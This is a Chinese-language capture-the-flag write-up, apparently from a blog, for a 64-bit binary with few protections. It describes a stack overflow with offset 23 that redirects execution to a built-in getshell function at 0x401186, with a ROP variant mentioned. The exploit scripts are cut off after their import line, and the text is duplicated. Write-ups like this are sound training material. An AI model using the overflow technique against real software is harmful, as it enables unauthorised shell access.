题目信息
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102301.jpg)
64位elf,简单输入,保护基本没开
静态分析
IDA,明显的溢出,并且直接有一个fun函数来getshell,那就控制rip跳到fun就可以
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102302.jpg)
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102303.jpg)
动态分析
gdb简单看一下,offset23,fun地址0x401186
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102304.jpg)
exploit
1 | from pwn import * |
另外一种方式,手动构造ROP:
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102305.jpg)
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102306.jpg)
1 | from pwn import * |
64位elf,简单输入,保护基本没开
IDA,明显的溢出,并且直接有一个fun函数来getshell,那就控制rip跳到fun就可以
gdb简单看一下,offset23,fun地址0x401186
1 | from pwn import * |
另外一种方式,手动构造ROP:
1 | from pwn import * |
最后更新时间:
水平不济整日被虐这也不会那也得学,脑子太蠢天天垫底这看不懂那学不会